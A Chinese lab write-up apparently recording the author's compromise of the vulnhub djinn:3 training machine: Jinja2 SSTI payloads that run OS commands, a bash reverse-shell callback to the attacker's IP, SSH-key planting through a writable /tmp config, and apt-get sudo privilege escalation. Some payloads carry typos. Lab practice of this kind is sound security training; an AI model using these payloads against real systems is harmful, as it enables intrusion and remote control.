一、前言
通过大量vulnhub受控靶机积累一线攻防经验和技巧。
二、环境
靶机名称:djinn:3
靶机难度:中级
目标:有1个flag——/root/proof.sh
攻击机:kali linux,IP地址192.168.100.9
靶机:os-bytesec,IP地址192.168.100.36
三、挑战过程
图一
1.扫描IP提供的IT服务——
nmap -v -A -sV -T4 -p 1-65535 192.168.100.36
图二
2.web服务-80端口探索和目录爆破
图三
3.探索web服务-5000端口
{{6*6}}
{{().__class__.__base__.__subclasses__()[156].__init__.__globals__['__builtins__']['__import__']('os').popen('ls -la').read()}}
4.创建反弹shell并监听
利用SSTI漏洞反弹shell
图四
图五
图六
通过极其痛苦的尝试探索,终于反弹shell成功了,哭死。
核心:
A——{{().__class__.__base__.__subclasses__()[156].__init__.__globa__['__builtins__']['__import__']('os').popen('echo "#!/bin/bash\nbash -i >&dev/tcp/192.168.100.9/6666 0>&1" > ./b.sh').read()}}
B——{{().__class__.__base__.__subclasses__()[156].__init__.__globa__['__builtins__']['__import__']('os').popen('chmod 777 b.sh').read()}}
C——{{().__class__.__base__.__subclasses__()[156].__init__.__globa__['__builtins__']['__import__']('os').popen('./b.sh').read()}}
图七
图八
或者nc监听反弹shell
图九
图十
5.探索权限提升
发现两个 pyc 文件——
.py与.pyc文件区别
原来Python的程序中,是把原始程序代码放在.py文件里,而Python会在执行.py文件的时候。将.py形式的程序编译成中间式文件(byte-compiled)的.pyc文件,这么做的目的就是为了加快下次执行文件的速度。
所以,在我们运行python文件的时候,就会自动首先查看是否具有.pyc文件,如果有的话,而且.py文件的修改时间和.pyc的修改时间一样,就会读取.pyc文件,否则,Python就会读原来的.py文件。
其实并不是所有的.py文件在与运行的时候都会产生.pyc文件,只有在import相应的.py文件的时候,才会生成相应的.pyc文件.
渗透测试过程有文件考虑反编译——
1.为了保护文件的完整性,我们拷贝其十六进制的数据,如何得到十六进制数据?使用 xxd 命令:
需要copy内容的机器——xxd .configuration.cpython-38.pyc
需要将内容在自己服务器反编译——vim configuration.pyc(Ctrl+Shift+V 粘贴上去,wq 保存退出)
2.将其用 xxd 命令转化为二进制格式:
xxd -r configure.pyc >> configure1.pyc
3.uncompyle6 反编译,没有的使用 pip3 install uncompyle6 下载:
uncompyle6 configure1.pyc >> configure.py
4.uncompyle6只支持python2.8-3.8问题解决:
我的python是3.9.8
vim /usr/local/lib/python3.9/dist-packages/xdis/magics.py
在add_canonic_versions里添加3.9.8保存退出即可解决不支持导致不可用问题
图十一
图十二
图十三
图十四
阅读一下源代码,在 syncer.py 文件中有 main 入口,我们从这里开始:可以看到提供了三种连接服务,分别为 FTP , SSH 和 URL。
我们再打开 configure.py 可以看到,syncer.py 文件中调用了 configure.py 的两个方法,让我们继续看 configure.py 中的方法。syncer.py 首先调用了 set_config_path() 方法,从命名上我们也可以得出这是设置配置路径的意思。
glob 方法是 glob 模块中的,它的功能相当于 windows 中的磁盘搜索文件,返回的元素是一个列表,从这里我们可以得出这里是得到 /home/saint 下的所有 json 文件[注意这个 saint ],以及得到 /tmp/ 目录下的所有 json 文件,然后把它俩合并成一个列表,并命名为 files。
继续往下看:
如果 files 的长度大于 2,这里就设置 files 前两个路径,后面的就是获取最后的文件名,然后比较得到的/home/saint/ 目录下的 json 文件名中的时间,和 /tmp/ 目录下的 json 文件名中的时间,如果 /tmp 目录下的时间比较早,就返回 /home下的,如果不是就返回 /tmp 下的。
到这里我们就大概知道做什么了,我们可以在 /tmp 创建一个命名格式为:dd-mm-yyyy.config.json 的文件,内容为:
[因为这里的 shell 不好创建文件,所以我们可以在 kali 先生成改 json 文件,然后使用 wget 命令下载该文件即可]
图十五
通过上述的 json 我们就可以把在 kali 生成的公钥传输到目标服务器上的 .ssh 目录中,即可实现免密登录,首先我们得生成公钥。
SSH免密登录(参考链接:)——
1.客户端生成公私钥
本地客户端生成公私钥:(一路回车默认即可)
ssh-keygen
上面这个命令会在用户目录.ssh文件夹下创建公私钥
cd ~/.ssh
ls
下创建两个密钥:
id_rsa (私钥)
id_rsa.pub (公钥)
2.上传id_rsa.pub (公钥)到服务器~/.ssh目录,存储文件名为authorized_keys
3.测试免密登录
ssh saint@192.168.100.36
图十六
sudo -l查看是否可以进行越权,查看/etc/sudoers探索越权
有了这个跟 root 同一组的用户,就可以读到一些只能root组和root读的文件:/etc/sudoers,该文件包含了能够让普通用户执行一些或者全部的root命令,如果该文件可以写入的话,我们可以把当前用户写入:r00t ALL=(ALL:ALL) ALL,这样当执行sudo su的时候,我们就可以进入到 root 了!但现在只有读权限,查看一波,可以发现有一个名为jason的用户可以以 root 身份执行 apt-get 命令,该用户不在/etc/passwd,我们可以通过创建这个用户来得到他的特权操作进行进一步越权。
图十七
图十八
apt-get 命令提权
图十九
图二十
图二十
四、总结
风险点:
1.SSTI
2.31337提供的IT服务存在弱口令
3.configure.py和syncer.py应该做混淆,避免反编译查看源码功能,同时其代码设计未很好考虑安全性和权限收缩
4.sudo权限配置滥用
五、疑问点
1.【high】configure.py和syncer.py代码逻辑基本读懂,但是不是包含所有细节性对接全部弄懂!!!
2.【high】SSTI漏洞不算彻底搞懂,需要找时间细细钻研!
3.【high】apt-get提权逻辑知道怎么操作,但是有点懵!
参考链接
1.【思路】https://www.freesion.com/article/80361034498/
2.【SSTI】https://www.cnblogs.com/bmjoker/p/13508538.html
3.【ssh免密】https://blog.csdn.net/jeikerxiao/article/details/84105529
4.【apt-get提权】https://gtfobins.github.io/
网友评论